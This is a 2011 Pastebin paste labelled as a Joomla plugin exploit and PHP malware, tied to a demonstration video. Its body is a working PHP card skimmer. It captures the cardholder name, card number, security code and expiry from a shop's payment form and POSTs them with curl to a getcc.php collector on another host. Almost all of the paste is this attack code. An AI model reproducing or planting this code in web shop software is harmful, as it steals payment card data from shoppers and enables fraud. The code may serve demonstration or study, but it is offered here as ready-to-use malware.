Advertisement
SecurityObscurity

dopost.php [Joomla Plugin Exploit + PHP Malware VIDEO]

Oct 16th, 2011
773
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.58 KB | None | 0 0
  1. /*
  2.  
  3. Code relative to: http://www.youtube.com/watch?v=TzujNB61FvE
  4.  
  5. */
  6. <?php                                                                                    
  7.                                                                                          
  8. if( isset($_POST['order_payment_name']) && trim($_POST['order_payment_name']) != "" ) {  
  9.                                                                                          
  10.         $var = "creditcard_code=".$_POST['creditcard_code']."&order_payment_name=".$_POST['order_payment_name']."&order_payment_number=".$_POST['order_payment_number']."&credit_card_code=".$_POST['credit_card_code']."&order_payment_expire_month=".$_POST['order_payment_expire_month']."&order_payment_expire_year=".$_POST['order_payment_expire_year'];      
  11.                                                                                          
  12.         $cd = curl_init();                                                              
  13.         curl_setopt($cd, CURLOPT_URL, "http://192.168.2.6/joomlashop/getcc.php");        
  14.         curl_setopt($cd, CURLOPT_POST, 1);                                              
  15.         curl_setopt($cd, CURLOPT_POSTFIELDS, $var);                                      
  16.                                                                                          
  17.         if( curl_exec($cd) )                                                            
  18.                 curl_close($cd);                                                        
  19. }                                                                                        
  20. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement